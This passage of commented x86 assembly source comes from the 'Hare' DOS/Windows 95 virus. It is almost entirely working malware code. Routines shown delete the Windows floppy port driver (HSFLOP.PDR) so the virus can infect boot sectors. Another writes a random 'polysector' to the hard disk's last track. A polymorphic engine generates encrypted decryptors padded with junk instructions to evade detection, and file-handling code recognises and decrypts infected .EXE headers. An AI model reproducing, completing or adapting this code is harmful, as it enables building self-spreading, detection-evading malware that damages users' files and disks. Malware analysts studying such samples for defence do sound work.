OFFSET FileName2 + DEC CX + DEC BX + CLD + + PUSH CS + POP ES + + REP MOVSB + CALL SUB_14 + + RETN +LOC_66: + MOV BX, 0Ah + + PUSH CS + POP ES + + RETN + +FileName1 DB 'DUM1.EXE.EXE', 0 +FileName2 DB 'DUM1.EXECOME', 0 +Command_Com DB 'COMMAND' +Port_Driver DB '\SYSTEM\IOSUBSYS\HSFLOP.PDR', 0 + + + +; Searches the program environment to find a 'WIN'-string. This matches +; normally to either WINBOOTDIR or WINDOWS, thus the Windows directory. +; It then appends the path '\SYSTEM\IOSUBSYS\HDFLOP.PDR' to the found +; directoryname. The file HSFLOP.PDR handles the port-level-access to disks, +; without it Windows needs to use the slow INT 13h (which the virus has +; hooked). Hare does this to also infect bootsectors under Windows 95/NT. + +Del_PortDriver: + + PUSH DS + PUSH DX + + XOR DI, DI + +Find_String: + MOV CX, 0FFFFh + + MOV AH, 62h ; Get PSP. + INT 21h + + MOV ES, BX + MOV ES, ES:[2Ch] ; ES = Program's environment- + CLD ; block (PATH, SET, etc). + +Get_Next_String: + + MOV AL, 0 + REPNE SCASB ; Find end of ASCIIZ-string. + MOV AX, ES:[DI] ; Get first word. + + OR AL, AL ; No settings? + JZ Exit_Del_Driver ; Then exit routine. + + AND AX, 1101111111011111b ; Convert to uppercase. + + CMP AX, 'IW' ; WINBOOTDIR/WINDOWS? + JNE Get_Next_String + + MOV AL, ES:[DI+2] ; Get third character. + AND AL, 11011111b ; To uppercase. + + CMP AL, 'N' ; Have we found WIN ? + JNE Get_Next_String + + MOV AL, '=' ; Value. + + REPNE SCASB ; Find '='. + JCXZ Exit_Del_Driver ; Not found? + + MOV SI, DI + MOV BX, DI + MOV DI, OFFSET Buffer + MOV DX, DI + + PUSH ES + POP DS + + PUSH CS + POP ES + + + ; This copies the string found above to our buffer. +Copy_Byte: + LODSB ; Copy byte to our buffer. + STOSB + + OR AL, AL ; End reached? + JNZ Copy_Byte ; No, then continue copy. + + DEC DI + + PUSH CS + POP DS + + MOV SI, OFFSET Port_Driver ; Append path to Windows-dir. + MOV CX, 28 + REP MOVSB + + MOV AH, 41h ; Delete portdriver. + CALL Traced_i21h + JNC Exit_Del_Driver + + CMP AL, 02h ; File not found? + ; (Wrong string fetched?) + MOV DI, BX + JZ Find_String + + STC +Exit_Del_Driver: + + POP DX + POP DS + + RETN + +DATA_70 DB 0 + DB 1Ah, 02h ; Read real-time clock. + DB 1Ah, 04h ; Read date from real-time clock. + DB 1Ah, 03h ; Set real-time clock. + DB 10h, 08h ; Read character and attribute. + DB 10h, 0Fh ; Get current display mode. + DB 10h, 0Bh ; Set color palette. + DB 21h, 0Dh ; Reset disk. + DB 21h, 18h ; Reserved. + DB 21h, 19h ; Get default drive. + + DB '!*!,!0!M!Q!T!b!' ; AND opcodes. + DB 0Bh, 21h, 0Dh, 21h +Int_Table: + INT 2Bh + INT 2Ch + INT 2Dh + INT 28h + INT 1Ch ; This is bad programming! + INT 08h ; This 1 2! + INT 0Ah + INT 0Bh + INT 0Ch + INT 0Dh + INT 0Fh + INT 0Eh + INT 70h + INT 71h + INT 72h + INT 73h + INT 74h + INT 75h + INT 76h ; Can cause problems 4 example wit MegaStealth. + INT 77h + INT 01h + INT 03h ; 1 byte breakpoint. + INT 03h +PushPop_Pairs: + PUSH AX + POP AX + PUSH BX + POP BX + PUSH CX + POP CX + PUSH DX + POP DX + PUSH DI + POP DI + PUSH SI + POP SI + PUSH BP + POP BP + PUSH DS + POP DS + PUSH ES + POP ES + PUSH SS + POP SS + +Random DW 0 +DATA_74 DB 1Eh + + +SUB_17: + CALL Get_Random_Poly ; Get random# in AX. + + TEST AH, 00010000b ; 1/8 chance. + JZ LOC_74 + + CMP BL, 02h + JE LOC_72 + + CMP BL, 04h + JE LOC_73 + + JMP LOC_74 + + +LOC_72: + ADD AL, 64 + JNC LOC_72 + + AND AL, 11111110b ; + + CMP AL, DATA_74 + JE SUB_17 + + MOV DATA_74, AL + + PUSH SI + + CBW + XCHG BX, AX + MOV SI, OFFSET Int_Table + MOV AX, [BX+SI] + + POP SI + + MOV BL, 02h + + RETN + +LOC_73: + ADD AL, 38 + JNC LOC_73 + + AND AL, 11111110b + + CMP AL, DATA_74 + JE SUB_17 + + MOV DATA_74, AL + PUSH SI + CBW + XCHG BX, AX + MOV SI, OFFSET DATA_70 + MOV AH, [BX+SI] + MOV DH, [BX+SI+1] + MOV AL, 0B4h + MOV DL, 0CDh + POP SI + MOV BL, 04h + + RETN +LOC_74: + MOV BL, 00h + + RETN + + + + +SUB_18: + MOV BP, 03h +LOC_75: + DEC BP + JZ LOC_RET_78 + + CALL SUB_17 + ADD CL, BL + + CMP BL, 2 + JB LOC_77 + JA LOC_76 + + STOSW + JMP LOC_75 +LOC_76: + STOSW + + MOV AX, DX + STOSW +LOC_77: + JMP LOC_75 + +LOC_RET_78: + RETN + +; +; +; +; Returns: BX = Random number 0 - 2. + +Get_Ran_3: + XOR BX, BX +LOC_79: + PUSH AX + CALL Get_Random_Poly + MOV BL, AL + POP AX + MOV AL, BL + + OR BL, BL + JZ LOC_79 + + AND BL, 00000011b ; 0 - 3. + + CMP BL, 3 ; 0 - 2. + JB LOC_RET_80 + + JMP LOC_79 + +LOC_RET_80: + RETN + + +Check_Poly_Sector: + + PUSH CS + PUSH CS + POP ES + POP DS + + MOV AH, 08h ; Get disk drive parameters + MOV DL, 80h ; of 1st harddisk. + INT 13h + + MOV BX, OFFSET Poly_Sector + MOV AX, 0201h + INC CH ; Last track of harddisk. + DEC DH ; + DEC DH + MOV CL, 01h ; 1st sector. + MOV DL, 80h + INT 13h + JC Exit_Poly_Check + + CALL Get_Random + AND AL, 00001111b ; 0 - 15. + + CMP AL, 7 + JE Gen_Poly_Sector + + CMP [BX], 0CCDDh ; Polysector already present? + JE Exit_Poly_Check + +Gen_Poly_Sector: + MOV CX, 256 ; 256 words. + MOV DI, BX + +Store_Random: + CALL Get_Random + ADD AX, [DI-2] ; Add previous value. + MOV [DI], AX + INC DI + INC DI + LOOP Store_Random + + MOV [BX], 0CCDDh ; Polysector signature. +LOC_83: + MOV AH, 08h ; Get disk drive parameters. + MOV DL, 80h + INT 13h + + MOV BX, OFFSET Poly_Sector ; Write polysector to disk. + MOV AX, 0301h + INC CH + DEC DH + DEC DH + MOV CL, 01h + MOV DL, 80h + INT 13h + JC LOC_85 + +Exit_Poly_Check: + + RETN +LOC_85: + MOV AX, 440Dh + MOV BX, 180h + MOV CX, 84Bh + INT 21h ; DOS Services ah=function 44h + ; IOctl-D block device control + ; bl=drive, cx=category/type + ; ds:dx ptr to parameter block + JMP LOC_83 + +; +; Gets a random number from the polymorphic sector. +; Returns: AX = Random number. +; +Get_Random_Poly: + + PUSH BX + + MOV BX, CS:Poly_Sector + + CMP BX, 512 + JB LOC_86 + + AND BX, 00000001b ; 0 - 1. + XOR BL, 00000001b ; Flip. +LOC_86: + ADD BX, 2 ; Next word. + MOV CS:Poly_Sector, BX + MOV AX, CS:[Poly_Sector+BX] + + POP BX + + RETN + + +; +; Return: AX = Random value (1 - 65535). +; +Get_Random: + XOR AL, AL + OUT 43h, AL ; port 43H, 8253 timer control + ; al = 0, latch timer0 count + JMP $+2 ; Delay for I/O. + IN AL, 40h + MOV AH, AL + + IN AL, 40h + XOR AL, AH + + XCHG AL, AH + PUSH CX + MOV CL, AH + AND CL, 00001111b + ROL AX, CL + MOV CX, AX + AND CX, 0000011111111111b + +Delay_Loop: + JMP $+2 + NOP + LOOP Delay_Loop + + POP CX + XOR CS:Random, AX + ADD AX, CS:Random + + OR AH, AH + JZ Get_Random + + OR AL, AL + JZ Get_Random + + RETN + +Poly_Engine: + PUSH SI + PUSH BX ; Filehandle. + + CLD + MOV Poly_Sector, 0 + XOR SI, SI + MOV DI, OFFSET Undoc + MOV DATA_77, 1C6Ah + + MOV AX, Host_Entrypoint + MOV DATA_84, AX + + CALL Get_Ran_3 + + MOV AL, [BX+Encr_Methods] + MOV AH, 0E0h + MOV word ptr Poke1, AX + MOV word ptr Shit3, AX + XOR BL, 03h + + MOV AL, Encr_Methods[BX] + MOV Shit2, AL + CALL Get_Random_Poly + MOV DATA_94, AL + MOV Key_3, AL + MOV DATA_82, AH + + POP BX + PUSH BX + + MOV word ptr Decrypt_2, 0F72Eh + MOV BYTE PTR Key_2, 15h + MOV CX, 14h + + +LOCLOOP_89: + LODSB ; String [si] to al +Shit3: + +;* SUB AL,AH + DB 28H,0E0H ; Fixup - byte match + STOSB ; Store al to es:[di] + LOOP LOCLOOP_89 ; Loop if cx > 0 + + MOV CX, 1ECh + +LOCLOOP_90: + LODSB ; String [si] to al + + CMP SI,1A3H + JB LOC_91 + + XCHG DATA_94, AH + XOR AL, AH + ADD AH, 01h + XCHG DATA_94, AH +LOC_91: + NOT AL +Poke1: +;* SUB AL,AH + DB 28H,0E0H ; Fixup - byte match + STOSB + LOOP LOCLOOP_90 + + CALL SUB_38 + JC LOC_94 + + MOV CX,DATA_77 + JCXZ LOC_93 ; Jump if cx=0 + + SUB CX, 200h + JC LOC_92 + + MOV DATA_77, CX + MOV CX, 200h + + JMP LOCLOOP_90 +LOC_92: + ADD CX, 512 + MOV DATA_77, 0 + + MOV DX, CX + + JMP LOCLOOP_90 +LOC_93: + CALL SUB_39 + CALL SUB_31 + CALL SUB_24 + + MOV DX, 1F6Ah + MOV AH, 40h + ADD CX, 11h + NOP + CALL Traced_i21h + CLC +LOC_94: + POP BX + POP SI + + RETN + + +SUB_24: + PUSH BX + PUSH BP + + MOV SI, OFFSET Undoc + MOV DI, OFFSET Drew1 + + XOR CX, CX + + CALL Make_Clear_Flags + MOV BL, 04h + CALL SUB_18 + CALL SUB_34 + CALL SUB_36 + CALL Make_Uncon_JMP + CALL SUB_25 + CALL Make_Uncon_JMP + CALL SUB_25 + CALL Make_Uncon_JMP + CALL SUB_25 + CALL Make_Uncon_JMP + MOV BL, 02h + CALL SUB_18 + CALL Make_Uncon_JMP + CALL Get_Random_Poly + + CMP AH, 128 + JB LOC_95 + + MOVSB + JMP LOC_96 +LOC_95: + OR Flags, 00010000b + SUB CL, 01h + INC SI +LOC_96: + CALL Make_Uncon_JMP + CALL SUB_28 + MOV CH,CL + MOV BL, 2 + CALL SUB_18 + CALL Make_Uncon_JMP + MOVSW + MOVSB + CALL Make_Uncon_JMP + CALL SUB_33 + MOV BL,2 + CALL SUB_18 + CALL SUB_27 + MOV BL,2 + CALL SUB_18 + CALL Make_Uncon_JMP + CALL SUB_26 + MOV BL,2 + CALL SUB_18 + CALL Make_Uncon_JMP + MOV AL,CL + SUB AL,CH + MOV CH,AL + LODSW ; String [si] to ax + SUB AH, CH + STOSW + MOV BL, 02h + CALL SUB_18 + CALL Make_Uncon_JMP + CALL SUB_30 + CALL Get_Random_Poly + AND AL, 00000111b + ADD CL, AL + MOV CH, 00h + + CMP Host_Type, CH + JE LOC_97 + + ADD File_Mod512, CX + CMP File_Mod512, 512 + JB LOC_97 + + INC Byte_Pages ; Rounding. + + SUB File_Mod512, 512 + JNZ LOC_97 + + DEC Byte_Pages +LOC_97: + POP BP + POP BX + + RETN + + +SUB_25: + PUSH CX + + XOR CX, CX + MOV AL, DATA_92 + MOV CL, AL + SHR AL, 2 ; DIV 4. + MOV DATA_92, AL + + AND CL, 03h + REP MOVSB + + POP CX + + RETN + + +SUB_26: + CALL Get_Random_Poly + + CMP BYTE PTR DATA_97,4 + JAE LOC_98 + + XOR AL, AH + JP LOC_98 ; Jump if parity=1 + + MOVSB + + RETN +LOC_98: + MOV BL, DATA_96 + MOV BH, 00h + + CMP BYTE PTR DATA_97, 06h + JAE LOC_100 + + CMP BYTE PTR DATA_97, 04h + JAE LOC_99 + + TEST AL, 00000001b + JNZ LOC_100 +LOC_99: + MOV DL, 01h + MOV DH, Uncon_Jumps[BX] + + JMP LOC_101 +LOC_100: + MOV DL, 0FFh + MOV DH, [BX+DATA_109] +LOC_101: + TEST AL, 00000010b + JNZ LOC_102 + + MOV AL, 81h + STOSB + + MOV AL, DH + STOSB + + MOV AL, DL + CBW + STOSW + INC SI + ADD CL, 03h + RETN +LOC_102: + MOV AL, 83h ; ADD + STOSB + + MOV AL, DH + STOSB + + MOV AL, DL + STOSB + + INC SI + ADD CL, 02h + RETN + + DB 0C3H + + +SUB_27: + CALL Get_Random_Poly + XOR AL, AH + JNS LOC_103 ; Jump if not sign + MOVSB + + RETN +LOC_103: + MOV BL, DATA_94 + MOV BH, 00h + CMP DATA_93, 80h + NOP + JA LOC_105 + + TEST AL, 00000001b + JNZ LOC_104 + + MOV DL, 01h + MOV DH, Uncon_Jumps[BX] + + JMP LOC_107 +LOC_104: + MOV DL, 0FFh + MOV DH, DATA_109[BX] + JMP LOC_107 +LOC_105: + TEST AL, 00000001b + JNZ LOC_106 + + MOV DL, 01h + MOV DH, DATA_109[BX] + JMP LOC_107 +LOC_106: + MOV DL, 0FFh + MOV DH, Uncon_Jumps[BX] +LOC_107: + TEST AL, 00000010b + JNZ LOC_108 + + MOV AL, 81h + STOSB + + MOV AL, DH + STOSB + + MOV AL, DL + CBW + STOSW + + INC SI + ADD CL, 03h + RETN + +LOC_108: + MOV AL, 83h ; ADD + STOSB + + MOV AL, DH + STOSB + + MOV AL, DL + STOSB + + INC SI + ADD CL, 02h + + RETN + + + +SUB_28: + CMP DATA_93, 128 + NOP + JA LOC_RET_112 + + PUSH DX + MOV DX, OFFSET Buffer + MOV AL, DATA_93 + AND AL, 07h + CBW + INC AX + ADD DX,AX + MOV BL,DATA_97 + + CMP BL, 06h + JE LOC_109 + + TEST BL, 00000001b + JNZ LOC_109 + + DEC DX +LOC_109: + MOV AH, AL + XOR BX, BX + MOV BL, DATA_94 + MOV AL, 81h + STOSB + + TEST AH, 00000001b + JZ LOC_110 + + MOV AL, Uncon_Jumps[BX] ; Store JMP opcode. + STOSB + + MOV AX, DX + NEG AX + STOSW + JMP LOC_111 +LOC_110: + MOV AL, DATA_109[BX] + STOSB + + MOV AX, DX + STOSW +LOC_111: + ADD CL,4 + POP DX + +LOC_RET_112: + RETN + + + +Make_Uncon_JMP: + CALL Get_Random_Poly + + TEST AL, 00100000b ; 1/8 chance. + JZ LOC_RET_116 + + TEST AL, 00001000b ; 1/8 chance. + JZ LOC_113 + + AND AH, 03h ; 0 - 3. + ADD AH, 01h ; Prevent zero JMP. + + MOV AL, 0EBh ; JMP SHORT opcode. + STOSW ; Store JMP SHORT. + + ADD CL, 02h + MOV AL, AH + + JMP LOC_114 +LOC_113: + AND AH, 03h ; 0 - 3. + ADD AH, 01h ; 1 - 4. + + MOV AL, 0E9h ; Store JMP opcode. + STOSB + + MOV AL, AH ; Store dataword. + CBW + STOSW + + ADD CL, 3 +LOC_114: + MOV BL, AL +LOC_115: + CALL Get_Random_Poly + MOV AH, AL + + CMP AH, 2Eh ; CS: override? + JE LOC_115 ; Then get another value. + + AND AH, 0F8h + + CMP AH, 0B0h ; MOV AL ? + JE LOC_115 ; Then get another value. + + STOSB + ADD CL, 01h + + SUB BL, 01h ; JMP-Hole filled with + JNZ LOC_115 ; garbage? + +LOC_RET_116: + RETN + + + +SUB_30: + TEST Flags, 00010000b + JNZ LOC_119 + + CALL Get_Random_Poly + + TEST AL, 00000100b + JNZ LOC_118 + + MOVSB + + RETN +LOC_118: + AND AH,7 + + CMP AH, 04h + JE SUB_30 + + MOV AL, AH + OR AL, 58h + STOSB + + MOV AL, 0FFh + OR AH, 0E0h + STOSW + + ADD CL, 02h + + RETN + + +LOC_119: + XOR Flags, 10h + MOV AL, 0E9h ; JMP opcode. + STOSB + + ADD CL, 2 + MOV AL, CL + CBW + ADD AX, 1E7Bh + NEG AX + STOSW + + RETN + + + +SUB_31: + PUSH BX + MOV SI, 0E70h + + CALL Get_Random_Poly + JNP LOC_120 ; Jump if not parity + + MOV DI, OFFSET Used_Mov_Ptr + MOV AX, [DI] + PUSH [DI+2] + PUSH SI + + MOVSW + MOVSB + + POP SI + MOV [SI], AX + POP AX + MOV [SI+2], AL +LOC_120: + MOV DI, OFFSET Undoc + CALL Get_Random_Poly + + CMP AL, 55h + JB LOC_121 + + CMP AL, 0AAh + JB LOC_122 + + MOV AX, [SI+3] + STOSW + MOVSW + MOVSB + + INC SI + INC SI + MOVSW + MOVSB + MOV BYTE PTR DATA_92, 3Eh + JMP LOC_123 +LOC_121: + MOVSW + MOVSB + MOV AX,[SI] + INC SI + INC SI + MOVSW + MOVSB + STOSW + MOV BYTE PTR DATA_92, 2Fh + JMP LOC_123 +LOC_122: + MOVSW + MOVSW + MOVSW + MOVSW + MOV BYTE PTR DATA_92, 3Bh +LOC_123: + MOV CX, 09h + REP MOVSB + POP BX + RETN + + + + +Make_Clear_Flags: + CALL Get_Random_Poly ; Get random number in AX. + + CMP AL, 128 ; 50% chance. + JB LOC_RET_127 + + TEST AH, 00001000b + JNZ LOC_125 + + MOV AL, 0FAh ; CLI +Store1: + STOSB + ADD CL, 01h + + RETN +LOC_125: + PUSH BX + + MOV BX, OFFSET PushPop_Pairs +LOC_126: + ADD AL, 20 ; Must be 20 or above. + JNC LOC_126 ; Overflow? + + CBW + AND AL, 0FEh ; Number must be even. + ADD BX, AX + MOV AH, [BX] ; Get PUSH reg. + + POP BX + + MOV AL, 9Dh ; POPF + + CMP Host_Type, 01h ; Host is .EXE ? + JE Store1 + + STOSW + ADD CL, 02h + +LOC_RET_127: + RETN + +LOC_128: + XOR Flags, 8 + + RETN + +SUB_33: + TEST Flags, 00001000b + JNZ LOC_128 + + PUSH BX +LOC_129: + CALL Get_Random_Poly + + TEST AH, 00000001b + JZ LOC_131 + + AND AX, 07h + MOV BX, AX + + CMP BL, 04h + JNE LOC_130 + + CMP BYTE PTR DATA_81, 0B0h + JE LOC_129 + + CMP BYTE PTR DATA_96, 00h + JE LOC_129 +LOC_130: + MOV AL, DATA_100[BX] + STOSB + + INC CL + POP BX + + RETN +LOC_131: + CMP BYTE PTR DATA_96, 0 + JE LOC_129 + + CMP BYTE PTR DATA_95, 0 + JE LOC_129 +LOC_132: + CALL Get_Random_Poly + AND AX,7 + + CMP AL,5 + JA LOC_132 + + SHL AL, 1 ; MUL 2. + MOV BX, AX + MOV AX, DATA_101[BX] + STOSW + + CMP BL,6 + JA LOC_133 + + CALL Get_Random_Poly + AND AL, 0Fh + STOSB + ADD CL, 1 + + CMP BL, 6 + JNE LOC_133 + + MOV AL, AH + STOSB + ADD CL, 1 +LOC_133: + ADD CL, 2 + POP BX + + RETN + + +SUB_34: + CALL Get_Random_Poly + + CMP AX, 5555h + JB LOC_RET_136 + + OR Flags, 00001000b + + CALL Make_Dummy_Int + CALL Get_Random_Poly + + XCHG BX, AX + AND BX, 02h + MOV AX, DATA_98[BX] + STOSW + + MOV DX, Host_Entrypoint + ADD DX, OFFSET Buffer + ADD DX, CX + ADD CL, 02h + + TEST AL, 00001000b + JNZ LOC_134 + + MOV AL, 81h ; Arithmic + STOSB + + ADD CL, 7 + CALL SUB_35 + + MOV AL, 0FAh + STOSB + + XCHG DX, AX + STOSW + + RETN + + +LOC_134: + MOV AL, 80h + STOSB + ADD CL,6 + CALL SUB_35 + + CMP AH, 80h + JA LOC_135 + + MOV AL, 0FBh + STOSB + MOV AL, DH + STOSB + + RETN +LOC_135: + MOV AL, 0FAh + STOSB + + XCHG DX, AX + STOSB + +LOC_RET_136: + RETN + + +SUB_35: +LOC_137: + CALL Get_Random_Poly + MOV BL, AL + AND BX, 07h + + CMP BL, 04h + JA LOC_137 + + MOV AL, DATA_99[BX] + STOSB + + CMP BL, 03h + JE LOC_139 + + CMP BL, 04h + JNE LOC_RET_140 + + TEST BYTE PTR [DI-2], 00000001b + JNZ LOC_138 + + NEG DH + NEG DL + + RETN +LOC_138: + NEG DX + RETN +LOC_139: + NOT DX + +LOC_RET_140: + RETN + + + +SUB_36: + TEST Flags, 00001000b + JZ LOC_RET_141 + + CALL Get_Random_Poly + AND AH, 7Fh + ADD AH, 0Ah + MOV AL, 75h + STOSW + +LOC_RET_141: + RETN + + +Make_Dummy_Int: + ADD CL, 02h + MOV BL, 2Ah + CALL Get_Random_Poly +LOC_142: + ADD AL, BL + JNC LOC_142 + + AND AX, 0000000011111110b + XCHG BX, AX + MOV AX, OFFSET Int_Table[BX] + STOSW + + RETN + + + +SUB_38: + PUSH AX + CMP DATA_77,0 + MOV CX,200H + JNZ LOC_143 + MOV CX,DX +LOC_143: + MOV DX, OFFSET Undoc + MOV DI, DX + MOV AH, 40h + CALL Traced_i21h + POP AX + + RETN + + +DATA_77 DW 0E6Ah +Host_Entrypoint DW 0 +DATA_79 DB 0BFh +DATA_80 DW 9 +DATA_81 DB 0B6h +DATA_82 DB 78h +Used_Mov_Ptr DB 0BBh +DATA_84 DW 0 +Used_Push_Ptr DB 57h +Shit9 DB 2Eh +Shit2 DB 0 +Shit1 DB 35h +Used_Ptr DB 4Fh +Shit8 DB 4Bh +Shit6 DB 77h + DB 0F9h, 0C3h + + +SUB_39: + PUSH BX + + CALL Get_Ran_3 + MOV AH, Mov_Ptr[BX] + MOV Used_Mov_Ptr, AH + + MOV AH, Push_Ptr[BX] + MOV Used_Push_Ptr, AH + + CALL Get_Random_Poly + MOV DATA_93, AH + + CMP AH, 128 ; 50% chance. + JA LOC_145 + + MOV AH, Dec_Ptr[BX] + + JMP LOC_146 +LOC_145: + MOV AH, Inc_Ptr[BX] +LOC_146: + MOV Used_Ptr, AH + MOV DL, BL + ADD BL, 3 + + CMP BL, 3 + JNE LOC_147 + + SUB BL, 2 +LOC_147: + MOV DATA_94,BL +LOC_148: + CALL Get_Random_Poly + NOT AX + AND AL, 07h + MOV BL, AL + SHR AL, 01h + + CMP DATA_94, AL + JE LOC_148 + + MOV DATA_95, AL + MOV AH, DATA_110[BX] + MOV DATA_81, AH + SHL DL, 03h + ADD BL, DL + MOV AH, DATA_111[BX] + MOV Shit1, AH +LOC_149: + CALL Get_Random_Poly + NOT AX + + MOV BL, AL + AND BL, 07h + + CMP BL, 6 + JA LOC_149 + + CMP DATA_94, BL + JE LOC_149 + + CMP DATA_95, BL + JE LOC_149 + + MOV DATA_96, BL + MOV AH, [BX+MOV_Reg] + + MOV DATA_79, AH + MOV AH, OFFSET [BX+DEC_Reg] + MOV Shit8, AH + + CALL Get_Random_Poly + AND AL, 00000111b ; 0 - 7. + CBW + MOV BX, AX + MOV AH, [Cond_Jumps+BX] + MOV Shit6, AH + MOV DATA_97, BL + CALL Get_Random_Poly + NOT AX + XOR BX, BX + MOV BL, AL + AND BL, 00000011b ; 0 - 3. + MOV AL, Host_Type + + OR AL, AL ; .COM-file? + JZ LOC_150 + + MOV BL, AL +LOC_150: + MOV AH, Overrides[BX] + MOV Shit9, AH + MOV AL, DATA_93 + AND AL, 00000111b ; 0 - 7. + CBW + INC AX ; 1 - 8. + ADD AX, OFFSET Buffer + MOV DATA_80, AX + POP BX + + RETN + +DATA_92 DB 0 +DATA_93 DB 38H +DATA_94 DB 5DH +DATA_95 DB 3 +DATA_96 DB 1 +DATA_97 DB 4 +DATA_98 DW 0EC8BH + DB 54H, 5DH +DATA_99 DB 7EH, 76H, 6EH, 66H, 46h + + +;; +DATA_100 DB 64h, 65h, 67h, 9Bh, 0D6h, 9Bh, 64h, 65h + +DATA_101 DW 0F0C0H + DB 0C1H,0F0H,0F6H,0C8H,0F7H,0C8H + DB 0D0H,0F0H,0D1H,0F0H + +; MOV BX DI SI +Mov_Ptr DB 0BBh, 0BFh, 0BEh + +; ---> PUSH BX DI SI +Push_Ptr DB 053h, 057h, 056h + +; ---> INC BX DI SI +Inc_Ptr DB 043h, 047h, 046h + +; ---> DEC BX DI SI +Dec_Ptr DB 4Bh, 4Fh, 4Eh + +; ---> MOV AX, BX, CX, DX, DI, SI, BP. +MOV_Reg DB 0B8h, 0BBh, 0B9h, 0BAh, 0BFh, 0BEh, 0BDh +DEC_Reg: + DEC AX + DEC BX + DEC CX + DEC DX + DEC DI + DEC SI + DEC BP + + +; ---> JMP +Uncon_Jumps DB 0E8h, 0EBh, 0E9h, 0EAh, 0EFh, 0EEh, 0EDh ; JMPs. +DATA_109 DB 0C0H, 0C3H,0C1H,0C2H,0C7H,0C6H,0C5H + +; ---> MOV AL AH BL BH CL CH DL DH +DATA_110 DB 0B0h, 0B4h, 0B3h, 0B7h, 0B1h, 0B5h, 0B2h, 0B6h +DATA_111 DB 7 + DB 27H, 00H, 00H, 0FH, 2FH, 17H + DB 37H, 05H, 25H, 1DH, 3DH, 0DH + DB 2DH, 15H, 35H, 04H, 24H, 1CH + DB 3CH, 0CH, 2CH, 14H, 34H + +; JNZ JNS JG JGE JA JNB JB JBE +Cond_Jumps DB 75h, 79h, 7Fh, 7Dh, 77h, 73h, 72h, 76h + +; DS: CS: ES: SS: +Overrides DB 3Eh, 2Eh, 26h, 36h ; Segment overrides. +Encr_Methods DB 30h, 00h, 28h, 30h ; encr. + +DATA_115 DB 0C0h, 0C4h, 0C3h, 0C7h, 0C1h, 0C5h, 0C2h, 0C6h + +DATA_116 DB 0E8h, 0ECh, 0EBh, 0EFh, 0E9h, 0EDh, 0EAh, 0EEh +DATA_117 DB 75h, 78h, 7Ch, 7Eh +DATA_118 DW 1F16h, 1F50h, 0D88Eh, 0716h + + DB 50H, 07H, 8EH, 0C0h +DATA_119 DB 0C0h, 0C9H, 0D2H, 0DBh +Int24h DW 4CBh, 512h +DATA_122 DW 6EEh +DATA_123 DW 70h + + + +; Dummy critical-error handler. +NewInt24h: + MOV AL, 03h +Do_IRET: IRET + + +Clean_File: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH ES + PUSH DS + PUSH DI + PUSH SI + + CALL Set_Dummy_Handlers + CALL Save_FileAttr + + MOV AX, 3D02h ; Open file r/w. + CALL Traced_i21h + JC LOC_155 + + PUSH AX + CALL Check_FileName + ADD BX, 04h + MOV CX, BX + POP BX + + CMP CX, 0Eh + JE LOC_154 + + PUSH CS + POP DS + + CLD + MOV DI, OFFSET FileName1 + MOV SI, OFFSET FileName2 + REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di] + JCXZ LOC_151 ; Jump if cx=0 + + JMP LOC_154 + +LOC_151: + MOV CX, 28 ; Read header. + MOV DX, OFFSET Buffer + MOV AH, 3Fh + CALL Traced_i21h + JC LOC_154 + + CALL Save_FileTime + MOV AX, Trace_Int + AND AL, 00011111b ; Clear all but seconds. + + CMP AL, 00010001b ; Infected stamp? + JNE LOC_153 + + MOV AX, Marker + + CMP AX, 'ZM' ; True .EXE? + JE Do_Clean_EXE + + CMP AX, 'MZ' + JNE LOC_153 +Do_Clean_EXE: + CALL SUB_41 + JC LOC_154 +LOC_153: + CALL Restore_FileTime +LOC_154: + MOV AH, 3Eh ; Close file. + CALL Traced_i21h +LOC_155: + CALL Restore_FileAttr + CALL Restore_Dummy_Handlers + + POP SI + POP DI + POP DS + POP ES + POP DX + POP CX + POP BX + POP AX + + RETN + +SUB_41: + MOV AX, Init_CS ; Size CS in bytes. + MOV DX, 16 + MUL DX + + ADD AX, Init_IP ; Plus IP. + ADC DX, 0 + + MOV CX, Header_Size ; Calculate headersize. + SHL CX, 04h ; MUL 16. + + ADD AX, CX ; Plus headersize. + ADC DX, 0 + + MOV CX, DX ; Go to entrypoint of host. + MOV DX, AX + MOV AX, 4200h + CALL Traced_i21h + JNC No_Err_2 + + RETN + + +No_Err_2: + SUB AX, Virus_Size + SBB DX, 0 + + PUSH AX + PUSH DX + + MOV AH, 3Fh + MOV CX, 128 + MOV DX, OFFSET Ruck + CALL Traced_i21h + JNC LOC_157 + + CMP AX, 36 + JA LOC_157 + + ADD SP, 04h + STC + RETN + +LOC_157: + PUSH BX + + MOV DI, AX + ADD DI, DX + MOV CX, 50 + STD + + MOV AL, '.' + REPNE SCASB + + OR CX, CX + JNZ LOC_158 + + POP BX + + ADD SP, 04h + STC + + RETN +LOC_158: + MOV AH, [DI+2] + XOR BX, BX + +LOC_159: + CMP Encr_Methods[BX], AH + JE LOC_161 + + INC BX + + CMP BX, 04h + JA LOC_160 + + JMP LOC_159 +LOC_160: + POP BX + + ADD SP, 04h + STC + + RETN + +LOC_161: + MOV AL,[DI+3] + XOR BX, BX +LOC_162: + CMP AL, DATA_111[BX] + JE LOC_164 + + INC BX + + CMP BX, 19h + JA LOC_163 + + JMP LOC_162 +LOC_163: + POP BX + ADD SP, 04h + STC + + RETN +LOC_164: + AND BL, 07h + MOV AL, DATA_110[BX] + MOV CX, 50 + REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al + + OR CX, CX + JNZ LOC_165 + + POP BX + ADD SP, 04h + STC + RETN +LOC_165: + MOV AL, [DI+2] + CLD + POP BX + POP CX + POP DX + PUSH DX + + PUSH CX + PUSH AX + + MOV AX, 4200h + ADD DX, OFFSET Old_Entry + ADC CX, 0 + CALL Traced_i21h + + MOV CX, 15 + MOV DX, OFFSET Ruck + MOV AH, 3Fh ; Read + CALL Traced_i21h + + POP AX + MOV byte ptr Crp_1, AH + JMP $+2 ; delay for I/O + MOV DI, DX + MOV CX, 15 + +LOCLOOP_166: +Crp_1: + ADD [DI],AL + NOT BYTE PTR [DI] + + INC DI + LOOP LOCLOOP_166 + + MOV DI,DX + + MOV AX,[DI] + MOV Init_IP, AX + + MOV AX, [DI+2] + MOV Init_CS, AX + + MOV AX, [DI+4] + MOV Init_SP, AX + + MOV AX, [DI+6] + MOV Init_SS, AX + + MOV AX, [DI+8] + MOV File_Mod512, AX + + MOV AX, [DI+0AH] + MOV Byte_Pages, AX + + MOV AX, [DI+0CH] + MOV Trace_Int, AX + + MOV AL, [DI+0EH] + + CMP AL, 01h + JE LOC_167 + + ADD SP,4 + STC + RETN +LOC_167: + POP CX + 